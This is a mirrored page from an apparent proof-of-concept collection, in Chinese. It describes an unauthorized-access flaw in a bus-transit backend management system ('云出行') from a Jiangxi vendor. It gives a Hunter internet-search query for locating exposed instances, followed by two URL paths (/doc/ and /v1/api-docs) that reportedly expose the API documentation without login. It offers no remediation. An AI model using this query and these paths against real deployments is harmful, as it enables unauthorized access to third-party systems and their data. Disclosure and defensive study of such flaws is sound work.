mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
31 lines
1.1 KiB
Markdown
31 lines
1.1 KiB
Markdown
|
|
# 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
江西云本数字科技有限公司总部设立于英雄城南昌,拥有原江西华兴信息产业科技有限公司的原班团队,拥有10年以上的研发、生产、销售智能化公交电子站牌的公交系统服务经验。江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 云出行后台管理系统
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter`web.body="云出行后台管理系统"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
/doc/
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/v1/api-docs
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-03-13 23:54:14
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pheadzhwmwz319mg>
|